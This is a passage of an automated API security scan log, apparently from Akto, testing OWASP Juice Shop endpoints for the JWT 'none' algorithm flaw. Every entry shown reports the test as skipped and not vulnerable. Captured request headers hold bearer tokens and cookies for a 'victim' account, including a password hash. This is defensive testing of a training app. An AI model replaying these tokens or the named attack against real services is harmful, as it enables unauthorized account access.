eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"32-vqgZNWxKAaJR+BtU04LY7YgnXPg\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"50","Date":"Thu, 09 Mar 2023 14:51:03 GMT","Content-Type":"application/json; charset=utf-8"}
{"captchaId":0,"captcha":"10-10*9","answer":"-80"}
Attempted errors :
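Error 1: Request API failed authentication check, skipping execution (no attempted request or response is recorded for this endpoint, so "Vulnerable: false" above reflects a skipped test rather than a server-side rejection)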
------------------------------------
API: https://juiceshop.akto.io/rest/languages GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"1232-ea+p0aX8IZishpw0BcROMCIZiVI\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"4658","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
[{"key":"az_AZ","lang":"Azərbaycanca","icons":["az"],"shortKey":"AZ","percentage":91.34615384615384,"gauge":"full"},{"key":"id_ID","lang":"Bahasa Indonesia","icons":["id"],"shortKey":"ID","percentage":34.855769230769226,"gauge":"quarter"},{"key":"ca_ES","lang":"Catalan","icons":["es-ct"],"shortKey":"CA","percentage":19.71153846153846,"gauge":"empty"},{"key":"cs_CZ","lang":"Česky","icons":["cz"],"shortKey":"CS","percentage":94.95192307692307,"gauge":"full"},{"key":"da_DK","lang":"Dansk","icons":["dk"],"shortKey":"DA","percentage":95.4326923076923,"gauge":"full"},{"key":"de_DE","lang":"Deutsch","icons":["de"],"shortKey":"DE","percentage":96.39423076923077,"gauge":"full"},{"key":"et_EE","lang":"Eesti","icons":["ee"],"shortKey":"ET","percentage":94.95192307692307,"gauge":"full"},{"key":"en","icons":["gb","us"],"shortKey":"EN","lang":"English","percentage":100,"gauge":"full"},{"key":"es_ES","lang":"Español","icons":["es"],"shortKey":"ES","percentage":95.1923076923077,"gauge":"full"},{"key":"fr_FR","lang":"Français","icons":["fr"],"shortKey":"FR","percentage":95.91346153846155,"gauge":"full"},{"key":"ga_IE","lang":"Gaeilge","icons":["ie"],"shortKey":"GA","percentage":0.7211538461538461,"gauge":"empty"},{"key":"it_IT","lang":"Italiano","icons":["it"],"shortKey":"IT","percentage":38.70192307692308,"gauge":"quarter"},{"key":"pl_PL","lang":"Język 
Polski","icons":["pl"],"shortKey":"PL","percentage":43.269230769230774,"gauge":"quarter"},{"key":"lv_LV","lang":"Latvijas","icons":["lv"],"shortKey":"LV","percentage":35.57692307692308,"gauge":"quarter"},{"key":"hu_HU","lang":"Magyar","icons":["hu"],"shortKey":"HU","percentage":12.259615384615383,"gauge":"empty"},{"key":"nl_NL","lang":"Nederlands","icons":["nl"],"shortKey":"NL","percentage":89.66346153846155,"gauge":"three-quarters"},{"key":"no_NO","lang":"Norsk","icons":["no"],"shortKey":"NO","percentage":86.53846153846155,"gauge":"three-quarters"},{"key":"pt_PT","lang":"Português","icons":["pt"],"shortKey":"PT","percentage":83.17307692307693,"gauge":"three-quarters"},{"key":"pt_BR","lang":"Português (Brasil)","icons":["br"],"shortKey":"BR","percentage":96.15384615384616,"gauge":"full"},{"key":"ru_RU","lang":"Pусский","icons":["ru"],"shortKey":"RU","percentage":98.79807692307693,"gauge":"full"},{"key":"ro_RO","lang":"Română","icons":["ro"],"shortKey":"RO","percentage":97.11538461538461,"gauge":"full"},{"key":"de_CH","lang":"Schwizerdütsch","icons":["ch"],"shortKey":"CH","percentage":96.63461538461539,"gauge":"full"},{"key":"fi_FI","lang":"Suomalainen","icons":["fi"],"shortKey":"FI","percentage":84.61538461538461,"gauge":"three-quarters"},{"key":"sv_SE","lang":"Svenska","icons":["se"],"shortKey":"SV","percentage":56.00961538461539,"gauge":"half"},{"key":"tr_TR","lang":"Türkçe","icons":["tr"],"shortKey":"TR","percentage":61.29807692307693,"gauge":"half"},{"key":"el_GR","lang":"Ελληνικά","icons":["gr"],"shortKey":"EL","percentage":44.230769230769226,"gauge":"quarter"},{"key":"bg_BG","lang":"български 
(език)","icons":["bg"],"shortKey":"BG","percentage":35.81730769230769,"gauge":"quarter"},{"key":"uk_UA","lang":"український","icons":["ua"],"shortKey":"UA","percentage":0.2403846153846154,"gauge":"empty"},{"key":"ka_GE","lang":"ქართული","icons":["ge"],"shortKey":"KA","percentage":35.33653846153847,"gauge":"quarter"},{"key":"he_IL","lang":"עברית","icons":["il"],"shortKey":"HE","percentage":64.90384615384616,"gauge":"half"},{"key":"ar_SA","lang":"عربي","icons":["ae","tn"],"shortKey":"AR","percentage":79.5673076923077,"gauge":"three-quarters"},{"key":"hi_IN","lang":"हिंदी","icons":["in"],"shortKey":"HI","percentage":35.57692307692308,"gauge":"quarter"},{"key":"si_LK","lang":"සිංහල","icons":["si"],"shortKey":"SI","percentage":2.403846153846154,"gauge":"empty"},{"key":"th_TH","lang":"ไทย","icons":["th"],"shortKey":"TH","percentage":74.27884615384616,"gauge":"three-quarters"},{"key":"my_MM","lang":"ျမန္မာ","icons":["mm"],"shortKey":"MY","percentage":20.673076923076923,"gauge":"empty"},{"key":"ko_KR","lang":"한국어","icons":["kr"],"shortKey":"KO","percentage":53.605769230769226,"gauge":"half"},{"key":"zh_CN","lang":"中文","icons":["cn"],"shortKey":"CN","percentage":99.51923076923077,"gauge":"full"},{"key":"ja_JP","lang":"日本語","icons":["jp"],"shortKey":"JA","percentage":99.03846153846155,"gauge":"full"},{"key":"zh_TW","lang":"繁體中文","icons":["tw"],"shortKey":"TW","percentage":99.27884615384616,"gauge":"full"},{"key":"zh_HK","lang":"繁體中文","icons":["hk"],"shortKey":"HK","percentage":31.009615384615387,"gauge":"quarter"}]
Attempted errors :
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution
------------------------------------
API: https://juiceshop.akto.io/rest/products/24/reviews PUT
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Origin":"https://juiceshop.akto.io","Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8","Content-Length":"52","Content-Type":"application/json"}
{"message":"good apple","author":"victim@gmail.com"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"14-Y53wuE/mmbSikKcT/WualL1N65U\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"20","Date":"Thu, 09 Mar 2023 14:50:55 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success"}
Attempted errors :
Error 1: Request API failed authentication check, skipping execution
------------------------------------
API: https://juiceshop.akto.io/rest/products/INTEGER/reviews GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"97-y0r9TBZWs55FMZphKTMDOIF+khg\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"151","Date":"Thu, 09 Mar 2023 14:50:55 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":[{"product":"24","message":"good apple","author":"victim@gmail.com","likesCount":0,"likedBy":[],"_id":"n9Ai6N6JY8vwKK4sv"}]}
Attempted errors :
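Error 1: Request API failed authentication check, skipping execution (no attempted request is recorded for this API, so "Vulnerable: false" above marks a skipped test, not a token with alg "none" that the server rejected)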
------------------------------------
API: https://juiceshop.akto.io/rest/products/search GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"325f-tM0qOaZXr+dGhzlHPS2N1JpgSNY\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"12895","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classic.","price":1.99,"deluxePrice":0.99,"image":"apple_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":24,"name":"Apple Pomace","description":"Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. Can be <a href=\"/#recycle\">sent back to us</a> for recycling.","price":0.89,"deluxePrice":0.89,"image":"apple_pressings.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":6,"name":"Banana Juice (1000ml)","description":"Monkeys love it the most.","price":1.99,"deluxePrice":1.99,"image":"banana_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":42,"name":"Best Juice Shop Salesman Artwork","description":"Unique digital painting depicting Stan, our most qualified and almost profitable salesman. He made a succesful carreer in selling used ships, coffins, krypts, crosses, real estate, life insurance, restaurant supplies, voodoo enhanced asbestos and courtroom souvenirs before <em>finally</em> adding his expertise to the Juice Shop marketing team.","price":5000,"deluxePrice":5000,"image":"artwork2.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":30,"name":"Carrot Juice (1000ml)","description":"As the old German saying goes: \"Carrots are good for the eyes. 
Or has anyone ever seen a rabbit with glasses?\"","price":2.99,"deluxePrice":2.99,"image":"carrot_juice.jpeg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":3,"name":"Eggfruit Juice (500ml)","description":"Now with even more exotic flavour.","price":8.99,"deluxePrice":8.99,"image":"eggfruit_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":25,"name":"Fruit Press","description":"Fruits go in. Juice comes out. Pomace you can send back to us for recycling purposes.","price":89.99,"deluxePrice":89.99,"image":"fruit_press.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":22,"name":"Green Smoothie","description":"Looks poisonous but is actually very good for your health! Made from green cabbage, spinach, kiwi and grass.","price":1.99,"deluxePrice":1.99,"image":"green_smoothie.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":41,"name":"Juice Shop \"Permafrost\" 2020 Edition","description":"Exact version of <a href=\"https://github.com/juice-shop/juice-shop/releases/tag/v9.3.1-PERMAFROST\">OWASP Juice Shop that was archived on 02/02/2020</a> by the GitHub Archive Program and ultimately went into the <a href=\"https://github.blog/2020-07-16-github-archive-program-the-journey-of-the-worlds-open-source-code-to-the-arctic\">Arctic Code Vault</a> on July 8. 
2020 where it will be safely stored for at least 1000 years.","price":9999.99,"deluxePrice":9999.99,"image":"permafrost.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":5,"name":"Lemon Juice (500ml)","description":"Sour but full of vitamins.","price":2.99,"deluxePrice":1.99,"image":"lemon_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":33,"name":"Melon Bike (Comeback-Product 2018 Edition)","description":"The wheels of this bicycle are made from real water melons. You might not want to ride it up/down the curb too hard.","price":2999,"deluxePrice":2999,"image":"melon_bike.jpeg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":38,"name":"OWASP Juice Shop \"King of the Hill\" Facemask","description":"Facemask with compartment for filter from 50% cotton and 50% polyester.","price":13.49,"deluxePrice":13.49,"image":"fan_facemask.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":8,"name":"OWASP Juice Shop CTF Girlie-Shirt","description":"For serious Capture-the-Flag heroines only!","price":22.49,"deluxePrice":22.49,"image":"fan_girlie.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":43,"name":"OWASP Juice Shop Card (non-foil)","description":"Mythic rare <small><em>(obviously...)</em></small> card \"OWASP Juice Shop\" with three distinctly useful abilities. Alpha printing, mint condition. 
A true collectors piece to own!","price":1000,"deluxePrice":1000,"image":"card_alpha.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":34,"name":"OWASP Juice Shop Coaster (10pcs)","description":"Our 95mm circle coasters are printed in full color and made from thick, premium coaster board.","price":19.99,"deluxePrice":19.99,"image":"coaster.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":37,"name":"OWASP Juice Shop Holographic Sticker","description":"Die-cut holographic sticker. Stand out from those 08/15-sticker-covered laptops with this shiny beacon of 80's coolness!","price":2,"deluxePrice":2,"image":"holo_sticker.png","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":19,"name":"OWASP Juice Shop Hoodie","description":"Mr. Robot-style apparel. But in black. And with logo.","price":49.99,"deluxePrice":49.99,"image":"fan_hoodie.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":13,"name":"OWASP Juice Shop Iron-Ons (16pcs)","description":"Upgrade your clothes with washer safe <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">iron-ons</a> of the OWASP Juice Shop or CTF Extension logo!","price":14.99,"deluxePrice":14.99,"image":"iron-on.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":26,"name":"OWASP Juice Shop Logo (3D-printed)","description":"This rare item was designed and handcrafted in Sweden. 
This is why it is so incredibly expensive despite its complete lack of purpose.","price":99.99,"deluxePrice":99.99,"image":"3d_keychain.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":14,"name":"OWASP Juice Shop Magnets (16pcs)","description":"Your fridge will be even cooler with these OWASP Juice Shop or CTF Extension logo <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">magnets</a>!","price":15.99,"deluxePrice":15.99,"image":"magnets.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":18,"name":"OWASP Juice Shop Mug","description":"Black mug with regular logo on one side and CTF logo on the other! Your colleagues will envy you!","price":21.99,"deluxePrice":21.99,"image":"fan_mug.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":15,"name":"OWASP Juice Shop Sticker Page","description":"Massive decoration opportunities with these OWASP Juice Shop or CTF Extension <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">sticker pages</a>! Each page has 16 stickers on it.","price":9.99,"deluxePrice":9.99,"image":"sticker_page.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":16,"name":"OWASP Juice Shop Sticker Single","description":"Super high-quality vinyl <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">sticker single</a> with the OWASP Juice Shop or CTF Extension logo! 
The ultimate laptop decal!","price":4.99,"deluxePrice":4.99,"image":"sticker_single.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":7,"name":"OWASP Juice Shop T-Shirt","description":"Real fans wear it 24/7!","price":22.49,"deluxePrice":22.49,"image":"fan_shirt.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":17,"name":"OWASP Juice Shop Temporary Tattoos (16pcs)","description":"Get one of these <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">temporary tattoos</a> to proudly wear the OWASP Juice Shop or CTF Extension logo on your skin! If you tweet a photo of yourself with the tattoo, you get a couple of our stickers for free! Please mention <a href=\"https://twitter.com/owasp_juiceshop\" target=\"_blank\"><code>@owasp_juiceshop</code></a> in your tweet!","price":14.99,"deluxePrice":14.99,"image":"tattoo.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":20,"name":"OWASP Juice Shop-CTF Velcro Patch","description":"4x3.5\" embroidered patch with velcro backside. The ultimate decal for every tactical bag or backpack!","price":2.92,"deluxePrice":2.92,"image":"velcro-patch.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":9,"name":"OWASP SSL Advanced Forensic Tool (O-Saft)","description":"O-Saft is an easy to use tool to show information about SSL certificate and tests the SSL connection according given list of ciphers and various SSL configurations. 
<a href=\"https://www.owasp.org/index.php/O-Saft\" target=\"_blank\">More...</a>","price":0.01,"deluxePrice":0.01,"image":"orange_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":36,"name":"OWASP Snakes and Ladders - Mobile Apps","description":"This amazing mobile app security awareness board game is <a href=\"https://steamcommunity.com/sharedfiles/filedetails/?id=1970691216\">available for Tabletop Simulator on Steam Workshop</a> now!","price":0.01,"deluxePrice":0.01,"image":"snakes_ladders_m.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":35,"name":"OWASP Snakes and Ladders - Web Applications","description":"This amazing web application security awareness board game is <a href=\"https://steamcommunity.com/sharedfiles/filedetails/?id=1969196030\">available for Tabletop Simulator on Steam Workshop</a> now!","price":0.01,"deluxePrice":0.01,"image":"snakes_ladders.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":2,"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"deluxePrice":2.49,"image":"orange_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":32,"name":"Pwning OWASP Juice Shop","description":"<em>The official Companion Guide</em> by Björn Kimminich available <a href=\"https://leanpub.com/juice-shop\">for free on LeanPub</a> and also <a href=\"https://pwning.owasp-juice.shop\">readable online</a>!","price":5.99,"deluxePrice":5.99,"image":"cover_small.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":23,"name":"Quince Juice (1000ml)","description":"Juice of the <em>Cydonia oblonga</em> fruit. 
Not exactly sweet but rich in Vitamin C.","price":4.99,"deluxePrice":4.99,"image":"quince.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":4,"name":"Raspberry Juice (1000ml)","description":"Made from blended Raspberry Pi, water and sugar.","price":4.99,"deluxePrice":4.99,"image":"raspberry_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":29,"name":"Strawberry Juice (500ml)","description":"Sweet & tasty!","price":3.99,"deluxePrice":3.99,"image":"strawberry_juice.jpeg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":21,"name":"Woodruff Syrup \"Forest Master X-Treme\"","description":"Harvested and manufactured in the Black Forest, Germany. Can cause hyperactive behavior in children. Can cause permanent green tongue when consumed undiluted.","price":6.99,"deluxePrice":6.99,"image":"woodruff_syrup.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null}]}
Attempted errors :
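Error 1: Request API failed to satisfy api_selection_filters block, skipping execution (no attempted request is recorded for this API, so "Vulnerable: false" above marks a skipped test, not a token with alg "none" that the server rejected)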
------------------------------------
API: https://juiceshop.akto.io/rest/user/login POST
